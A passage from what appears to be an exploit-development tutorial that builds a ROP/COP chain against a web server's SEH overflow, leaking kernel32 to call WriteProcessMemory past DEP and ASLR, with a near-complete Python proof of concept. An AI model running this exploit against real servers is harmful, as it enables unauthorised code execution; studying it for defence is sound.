It should also be noted that each time one of these ROP gadgets executes, the AL register is increased by 0x39. We will compensate for this in the future. Since AL only makes up the lower 8 bits of the EAX register, this will not have much of an adverse effect on what we are trying to accomplish.
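A quick model shows why the side effect is contained. The starting EAX value below is hypothetical; the point is only that add al, 0x39 wraps within the low byte and never carries into the upper 24 bits of EAX.

```python
def add_al(eax, imm8):
    """Model `add al, imm8`: only the low byte of EAX changes, with 8-bit wraparound."""
    al = (eax + imm8) & 0xFF
    return (eax & 0xFFFFFF00) | al

eax = 0x0012F480             # hypothetical stack address held in EAX
start = eax
for _ in range(12):          # twelve inc ecx ; add al, 0x39 ; ret gadgets
    eax = add_al(eax, 0x39)

print(hex(start), hex(eax))
```

After twelve executions EAX has moved, but it still lies within the same 256-byte window as the original address.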

The state of the registers before execution can be seen below.

ECX, after the ROP gadgets are executed, is loaded with the address for the nSize parameter placeholder.

A nice gadget can be found, after parsing the PE, to overwrite the parameter placeholder with the legitimate parameter.

crash += struct.pack('<L', 0x1001f5b4)    # mov dword ptr [ecx], edx

The state of the parameters before the overwrite occurs can be seen below.

As we can see, the junk 0x22222222 parameter will be the target for the overwrite.

Stepping through the instruction, we have dynamically changed the parameter placeholder for nSize to the legitimate parameter!

kernel32!WriteProcessMemory

Perfect! All that is left now is to extract our current pointer to kernel32.dll and calculate the offset between kernel32!WriteFileImplementation and kernel32!WriteProcessMemory. After this, we will use the same primitive to dynamically overwrite the kernel32!WriteProcessMemory parameter placeholder so that it points to the actual API.

Currently, ECX (the register we have been leveraging for each of the arbitrary writes to overwrite function parameter placeholders) is 0x14 (20 decimal) bytes away from the kernel32!WriteProcessMemory parameter placeholder.

Knowing this, we will prepare another arbitrary write by decrementing ECX by 0x14 bytes.

crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)

Once the ROP gadgets have executed, ECX now contains the same address as the parameter placeholder for kernel32!WriteProcessMemory.

The goal now is to dereference the kernel32!WriteProcessMemory parameter placeholder and place it in a CPU register we have control over.

Since ECX is reserved for the arbitrary write, we will use EAX to hold the address of the kernel32!WriteProcessMemory parameter placeholder as well.

Recall that EDX still contains a value of 0x180, from the nSize parameter. After all, we have not manipulated EDX since. Conveniently, the current distance between the address within EAX and the kernel32!WriteProcessMemory parameter placeholder is 0x260.

Since we already have a COP gadget that increases EDX in steps of 0x20, we can reuse it to add another 0xE0 bytes (seven executions) on top of the existing 0x180 - which will give us a value of 0x260! Once EDX contains the value of 0x260, we can subtract it from EAX and place the difference in EAX. This will allow us to store the address of the kernel32!WriteProcessMemory parameter placeholder in EAX. This time, however, since EDI already contains the old “return to the stack” routine - we can just directly add to EDX.

crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)

After the add edx COP gadgets execute, EDX contains the distance between the kernel32!WriteProcessMemory parameter placeholder and EAX (which is 0x260).

After the COP gadgets execute, the sub eax, edx ; ret gadget takes over execution - resulting in EAX now containing the address of the kernel32!WriteProcessMemory parameter placeholder.
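The register arithmetic can be sanity-checked with a few lines of Python. This is a sketch under two assumptions: EDX enters the routine holding 0x180, and the COP gadget runs seven times, as it does in the full PoC. The placeholder address is just the example value from the debugging session and changes on every run.

```python
MASK32 = 0xFFFFFFFF

edx = 0x180                      # left over from the nSize routine
for _ in range(7):               # seven more add edx, 0x20 COP gadgets
    edx = (edx + 0x20) & MASK32

placeholder = 0x02636920         # example stack address of the placeholder (changes per run)
eax = placeholder + 0x260        # EAX starts 0x260 bytes past the placeholder

eax = (eax - edx) & MASK32       # sub eax, edx ; ret
print(hex(edx), hex(eax))
```

EDX ends at 0x260, and EAX lands exactly on the placeholder address.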

So currently, as it stands, the stack address of 0x2636920, which changes when the process restarts, points to 0x61c832e4 - which then points to the kernel32.dll address. This means we have a pointer to a pointer to the pointer we would like to extract. Knowing this, we will dereference 0x2636920 and store the result (which is 0x61c832e4) into EAX. Then, utilizing the exact same routine, we will dereference 0x61c832e4 (which is a pointer to kernel32!WriteFileImplementation) and store the result in EAX. We can achieve this with two ROP gadgets.

crash += struct.pack('<L', 0x1002248c)    # mov eax, dword [eax] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1002248c)    # mov eax, dword [eax] ; ret: ImageLoad.dll (non-ASLR enabled module)

Program execution hits the first gadget, where WinDbg shows us what will be placed in EAX (0x61c832e4).

Utilizing the same ROP gadget, we successfully extract a pointer to kernel32.dll into EAX - dynamically!
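The two dereferences can be modeled with a toy memory map. The first two addresses are the ones seen in the debugger above; the kernel32 address is a made-up stand-in, since the real value changes with ASLR.

```python
KERNEL32_FUNC = 0x76A01234       # hypothetical address inside kernel32.dll
memory = {
    0x02636920: 0x61C832E4,      # stack placeholder -> non-ASLR pointer
    0x61C832E4: KERNEL32_FUNC,   # non-ASLR pointer -> kernel32 function
}

def mov_eax_deref(eax):
    """Model `mov eax, dword [eax] ; ret` against the toy memory map."""
    return memory[eax]

eax = 0x02636920
eax = mov_eax_deref(eax)         # first gadget: EAX = 0x61c832e4
eax = mov_eax_deref(eax)         # second gadget: EAX = kernel32 pointer
print(hex(eax))
```

Because the chain never hardcodes the kernel32 address, the same two gadgets keep working after a reboot moves kernel32.dll.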

This is great news. We have defeated ASLR on the system itself. What needs to happen now is that we need to find the offset between kernel32!WriteProcessMemory and kernel32!WriteFileImplementation. To do this, we can use WinDbg.

Great! The distance between the two functions is 0xfffaca4d (remember, to avoid NULL bytes - we use the negative distance).

However, if we subtract these two values - it seems as though there is an issue and kernel32!WriteProcessMemory is not extracted properly.

Instead of fighting with two’s complement math - let’s just use a different function from the IAT. Preferably, let’s find a function whose virtual address is lower than that of kernel32!WriteProcessMemory.

Looking at the IAT for ImageLoad, we can see there is a nice IAT entry that points to kernel32!GetStartupInfoA.

Subtracting the two functions results in a value of 0xfffffd2d - and also yields our desired output!
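To see why the negative form is used, here is a short check of the two's complement encoding. It assumes 0xfffffd2d is kernel32!GetStartupInfoA minus kernel32!WriteProcessMemory, which makes the positive distance 0x2d3. The runtime address of GetStartupInfoA below is hypothetical.

```python
import struct

MASK32 = 0xFFFFFFFF

distance = 0x2D3                          # WriteProcessMemory - GetStartupInfoA (implied by 0xfffffd2d)
negative = (-distance) & MASK32           # 32-bit two's complement encoding
packed = struct.pack('<L', negative)

get_startup_info = 0x76A10000             # hypothetical runtime address of kernel32!GetStartupInfoA
write_process_memory = (get_startup_info - negative) & MASK32   # what sub eax, edx computes

print(hex(negative), b'\x00' in packed, hex(write_process_memory - get_startup_info))
```

Packing the positive distance directly would put two NULL bytes into the buffer, whereas subtracting the negative value yields the same address with no NULL bytes.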

Now that we have solved this issue, let’s show the full PoC up until this point.

import sys
import os
import socket
import struct

# 4063 byte SEH offset
# Stack pivot lands at padding buffer to SEH at offset 2563
crash = "\x90" * 2563

# Stack pivot lands here
# Beginning ROP chain


# Saving address near ESP for relative calculations into EAX and ECX
# EBP is near stack address
crash += struct.pack('<L', 0x61c05e8c)    # xchg eax, ebp ; ret: sqlite3.dll (non-ASLR enabled module)

# EAX is now 0xfec bytes away from ESP. We want current ESP + 0x28 (to compensate for loading EAX into ECX eventually) into EAX
# Popping negative ESP + 0x28 into ECX and subtracting from EAX
# EAX will now contain a value at ESP + 0x24 (loading ESP + 0x24 into EAX, as this value will be placed in EBP eventually. EBP will then be placed into ESP - which will compensate for the ROP gadget that moves EAX into ECX and ends with "leave")
crash += struct.pack('<L', 0x10018606)    # pop ecx ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0xffffefe0)    # Negative ESP + 0x28 offset
crash += struct.pack('<L', 0x1001283e)    # sub eax, ecx ; ret: ImageLoad.dll (non-ASLR enabled module)

# This gadget is to get EBP equal to EAX (which is further down on the stack) - due to the mov eax, ecx ROP gadget that eventually will occur.
# Said ROP gadget has a "leave" instruction, which will load EBP into ESP. This ROP gadget compensates for this gadget to make sure the stack doesn't get corrupted, by just "hopping" down the stack
# EAX and ECX will now equal ESP - 8 - which is good enough in terms of needing EAX and ECX to be "values around the stack"
crash += struct.pack('<L', 0x61c30547)    # add ebp, eax ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c6588d)    # mov ecx, eax ; mov eax, ecx ; add esp, 0x24 ; pop ebx ; leave ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget (pop ebx)
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget (pop ebp in leave instruction)

# Jumping over kernel32!WriteProcessMemory placeholder parameters
crash += struct.pack('<L', 0x10015eb4)    # add esp, 0x1c ; ret: ImageLoad.dll (non-ASLR enabled module)

# kernel32!WriteProcessMemory placeholder parameters
crash += struct.pack('<L', 0x1004d1ec)    # Pointer to kernel32!GetStartupInfoA (no pointers from IAT directly to kernel32!WriteProcessMemory, so loading pointer to kernel32.dll and compensating later.)
crash += struct.pack('<L', 0x61c72530)    # Return address parameter placeholder (where function will jump to after execution - which is where shellcode will be written to. This is an executable code cave in the .text section of sqlite3.dll)
crash += struct.pack('<L', 0xFFFFFFFF)    # hProcess = handle to current process (Pseudo handle = 0xFFFFFFFF points to current process)
crash += struct.pack('<L', 0x61c72530)    # lpBaseAddress = pointer to where shellcode will be written to. (0x61C72530 is an executable code cave in the .text section of sqlite3.dll) 
crash += struct.pack('<L', 0x11111111)    # lpBuffer = base address of shellcode (dynamically generated)
crash += struct.pack('<L', 0x22222222)    # nSize = size of shellcode 
crash += struct.pack('<L', 0x1004D740)    # lpNumberOfBytesWritten = writable location (.idata section of ImageLoad.dll address in a code cave)

# Starting with lpBuffer (shellcode location)
# ECX currently points to lpBuffer placeholder parameter location - 0x18
# Moving ECX 8 bytes before EAX, as the gadget to overwrite dword ptr [ecx] overwrites it at an offset of ecx+0x8
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)

# Pointing EAX (shellcode location) to data inside of ECX (lpBuffer placeholder) (NOPs before shellcode)
crash += struct.pack('<L', 0x1001fce9)    # pop esi ; add esp, 0x8 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0xfffffd44)    # Shellcode is about negative 0xfffffd44 bytes away from EAX
crash += struct.pack('<L', 0x90909090)    # Compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Compensate for above ROP gadget
crash += struct.pack('<L', 0x10022f45)    # sub eax, esi ; pop edi ; pop esi ; ret
crash += struct.pack('<L', 0x90909090)    # Compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Compensate for above ROP gadget

# Changing lpBuffer placeholder to actual address of shellcode
crash += struct.pack('<L', 0x10021bfb)    # mov dword [ecx+0x8], eax ; ret: ImageLoad.dll (non-ASLR enabled module)

# nSize parameter (0x180 = 384 bytes)
crash += struct.pack('<L', 0x100103ff)    # pop edi ; ret: ImageLoad.dll (non-ASLR enabled module) (Compensation for COP gadget add edx, 0x20)
crash += struct.pack('<L', 0x1001c31e)    # add esp, 0x8 ; ret: ImageLoad.dll (non-ASLR enabled module) (Returns to stack after COP gadget)
crash += struct.pack('<L', 0x10022c4c)    # xor edx, edx ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)

# Incrementing ECX to place the nSize parameter placeholder into ECX
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)

# Pointing nSize parameter placeholder to actual value of 0x180 (in EDX)
crash += struct.pack('<L', 0x1001f5b4)    # mov dword ptr [ecx], edx

# ECX currently is located at kernel32!WriteProcessMemory parameter placeholder - 0x8
# Need to first extract sqlite3.dll pointer (which is a pointer to kernel32) and then calculate offset from kernel32!GetStartupInfoA

# ECX = kernel32!WriteProcessMemory parameter placeholder + 0x14 (20)
# Decrementing ECX by 0x14 firstly (parameter is 0xc bytes in front of ECX. Subtracting ECX by 0xC to place placeholder in ECX. Additionally, the overwrite gadget writes to ECX at an offset of ECX+0x8. Adding 0x8 more bytes to compensate.)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)

# Extracting pointer to kernel32.dll into EAX

# EDX contains a value of 0x180 from nSize parameter
# EDI still contains return to stack ROP gadget for COP gadget compensation
# EAX is 0x260 bytes ahead of the kernel32!WriteProcessMemory parameter placeholder
# Subtracting 0x260 from EAX via EDX register
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)

# Loading kernel32!WriteProcessMemory parameter placeholder location into EAX to be dereferenced
crash += struct.pack('<L', 0x10015ce5)    # sub eax, edx ; ret: ImageLoad.dll (non-ASLR enabled module)

# Extracting kernel32!WriteProcessMemory parameter placeholder
crash += struct.pack('<L', 0x1002248c)    # mov eax, dword [eax] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1002248c)    # mov eax, dword [eax] ; ret: ImageLoad.dll (non-ASLR enabled module)


# 4063 total offset to SEH
crash += "\x41" * (4063-len(crash))

# SEH only - no nSEH because of DEP
# Stack pivot to return to buffer
crash += struct.pack('<L', 0x10022869)    # add esp, 0x1004 ; ret: ImageLoad.dll (non-ASLR enabled module)

# 5000 total bytes for crash
crash += "\x41" * (5000-len(crash))

# Replicating HTTP request to interact with the server
# UserID contains the vulnerability
http_request = "GET /changeuser.ghp HTTP/1.1\r\n"
http_request += "Host: 172.16.55.140\r\n"
http_request += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0\r\n"
http_request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
http_request += "Accept-Language: en-US,en;q=0.5\r\n"
http_request += "Accept-Encoding: gzip, deflate\r\n"
http_request += "Referer: http://172.16.55.140/\r\n"
http_request += "Cookie: SESSIONID=9349; UserID=" + crash + "; PassWD=;\r\n"
http_request += "Connection: Close\r\n"
http_request += "Upgrade-Insecure-Requests: 1\r\n"

print "[+] Sending exploit..."
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.130", 80))
s.send(http_request)
s.close()

Now that we have an updated POC, let’s use a ROP routine to subtract this value from EAX.

# Preparing EDX by clearing it out
crash += struct.pack('<L', 0x10022c4c)    # xor edx, edx ; ret: ImageLoad.dll (non-ASLR enabled module)

# Beginning calculations for EBX
crash += struct.pack('<L', 0x100141c8)    # pop ebx ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0xfffffd2d)    # Negative distance to kernel32!WriteProcessMemory

# Transferring EBX to EDX
crash += struct.pack('<L', 0x10022c1e)    # add edx, ebx ; pop ebx ; retn 0x10: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x90909090)    # Compensating for above ROP gadget

# Placing kernel32!WriteProcessMemory into EAX
crash += struct.pack('<L', 0x10015ce5)    # sub eax, edx ; ret: ImageLoad.dll (non-ASLR enabled module)

# ROP gadget compensations
crash += struct.pack('<L', 0x90909090)    # Compensation for retn 0x10 in previous ROP gadget
crash += struct.pack('<L', 0x90909090)    # Compensation for retn 0x10 in previous ROP gadget
crash += struct.pack('<L', 0x90909090)    # Compensation for retn 0x10 in previous ROP gadget
crash += struct.pack('<L', 0x90909090)    # Compensation for retn 0x10 in previous ROP gadget

The above routine will do the following:

  1. Zero out EDX
  2. Place the offset into EBX
  3. Move the offset to EDX
  4. Subtract EDX (the offset) from EAX - placing the result in EAX

The negative distance between the two kernel32.dll pointers is loaded into EBX.

The distance is then loaded into EDX.

Program execution then reaches the sub eax, edx instruction.

This allows us to successfully extract kernel32!WriteProcessMemory!
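To make the arithmetic a bit more concrete, here is a minimal sketch of what the sub eax, edx gadget does with the negative distance. The runtime address used for kernel32!GetStartupInfoA below is made up purely for illustration, and the helper names are my own. Subtracting a negative 32-bit value wraps around and effectively adds the positive distance, which also keeps the small (null byte filled) positive value out of the buffer.

```python
MASK32 = 0xFFFFFFFF

def sub32(a, b):
    """Emulate a 32-bit `sub a, b`: the result wraps modulo 2**32."""
    return (a - b) & MASK32

def encode_negative(distance):
    """Two's complement encoding of -distance as a 32-bit value."""
    return (-distance) & MASK32

# Value popped into EBX (and then added into the zeroed EDX) in the routine above
popped = 0xFFFFFD2D

# The positive distance this value encodes
distance = (-popped) & MASK32

# Hypothetical runtime address of kernel32!GetStartupInfoA (assumption, not from a real system)
get_startup_info = 0x76001000

# sub eax, edx with EDX = negative distance is the same as adding the positive distance
resolved = sub32(get_startup_info, popped)

print("distance = " + hex(distance))
print("resolved = " + hex(resolved))
```

In other words, on the kernel32.dll build used here, the target function sits 0x2d3 bytes past the pointer we leaked, and encode_negative(0x2d3) gives back the 0xfffffd2d value used in the POC.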

Perfect! All that is left to do now is use our arbitrary write primitive to overwrite the kernel32!WriteProcessMemory parameter placeholder on the stack with the actual address of kernel32!WriteProcessMemory.

If you recall, we already decremented ECX so that it contains the address of the parameter placeholder. However, the ROP gadget we will use for our arbitrary write writes to ECX at an offset of 0x8. To compensate for this, we will decrement ECX by 0x8 bytes. This way, when the arbitrary write gadget adds 0x8 to ECX, we will have already compensated.

crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
